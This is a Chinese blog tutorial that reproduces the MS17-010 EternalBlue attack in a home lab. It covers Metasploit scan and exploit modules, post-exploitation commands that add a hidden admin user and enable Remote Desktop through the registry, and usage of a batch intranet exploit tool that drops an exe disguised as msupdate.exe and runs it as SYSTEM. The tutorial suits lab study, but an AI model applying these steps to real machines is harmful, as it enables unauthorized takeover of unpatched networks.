banner
肥皂的小屋

肥皂的小屋

github
steam
bilibili
douban

永恒之蓝-ETERNALBLUE漏洞MS17-010利用过程

事情起因#

雖然距離上一次 WannaCry 席捲全球 (17-05-12) 已經過去一年多了,現在來複現有炒冷飯的嫌疑,但是還是有價值的

參考文章:

環境準備#

  • Kali:192.168.2.6
  • Win7_SP1:192.168.2.7:默認為 Administrator 帳戶無密碼
  • WinXP_SP3:192.168.2.4

使用 metasploit#

搜索模組#

使用 metasploit 來進行掃描和攻擊,我們先看一下關於 ms17_010 的模組有哪些:

image

掃描模組用

auxiliary/admin/smb/ms17_010_command

或者使用這個

auxiliary/scanner/smb/smb_ms17_010

攻擊模組我們使用exploit/windows/smb/ms17_010_eternalblue

使用掃描模組進行掃描#

auxiliary/admin/smb/ms17_010_command

image

可以看到 winxp 掃描成功了,win7 沒有掃描到,我們換另一個掃描模組:

auxiliary/scanner/smb/smb_ms17_010

image

可以看到這個模組兩個靶機它都認為可以攻擊

使用攻擊模組進行攻擊#

exploit/windows/smb/ms17_010_eternalblue

image

開了防火牆的情況下是攻擊不了的,關掉就可以攻擊了。

對靶機進行控制#

此處補充一下哪下 shell 中文顯示亂碼的問題:

輸入chcp 65001即可

image

創建用戶並添加到管理員組#

net user soapffz adminpasswd /add
net localgroup administrators soapffz /add

image

開啟遠程桌面功能#

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

關閉時使用如下語句:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

image

遠程桌面連接#

image

如果你的電腦是登陸了其他帳戶的話,這個遠程桌面窗口會一直等待 20 秒左右,這邊沒有反應的話就會把管理員帳戶擠下去,就進桌面了:

image

Windows 下的檢測 && 攻擊工具#

EternalBlues 批量檢測工具#

下載連接:http://omerez.com/repository/EternalBlues.exe

可以批量檢測當前電腦所在局域網內的主機是否存在 ms17_010 漏洞 (速度較快):

image

MS_17_010_Scanv2.1 檢測工具#

下載鏈接:https://www.lanzous.com/i359xch

速度較慢:

image

cping 批量檢測工具 (19-02-23 更新)#

介紹及使用參考文章:內網 - 掃描存活主機

k8 加強版 zzz 攻擊工具 (19-02-23 更新)#

內網批量 MS17-010 溢出工具,出自 k8 團隊:https://www.cnblogs.com/k8gege/p/10391101.html

以下教程搬運自 k8:

工具:k8加強版zzz

編譯:python

漏洞:MS17-010

用法:

zzz_exploit.exe 192.11.22.82
zzz_exploit.exe 192.11.22.82 exe參數
zzz_exploit.exe 192.11.22.82 exe參數 管道名

如exe啟動參數為  m.exe -Start 實戰命令為 zzz_exploit.exe 192.11.22.82 -Start

內網批量

可結合cping批量溢出內網,將名稱改為smbcheck即可,但exe必須使用無參版。(其它工具也可以,提供個IP參數即可)

因為cping只會傳IP進去,不會傳其它參數。使用前需將任意exe改名為ma.dat

溢出成功會自動將exe傳入目標機器,並以system權限啟動exe程序。

我們先試一下不帶 exe 程序執行的效果:

image

然後我們把一個經典的 IP 雷達工具按照教程所示改名為 ma.dat 放到文件夾中:

image

然後再試一下:

image

可以看到上傳我們的 IP 雷達 exe 到了C:\WINDOWS\Temp\msupdate.exe,但是我們這不是一個馬子所以啟動服務失敗了:

image

大概用法就是這樣

載入中......
此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。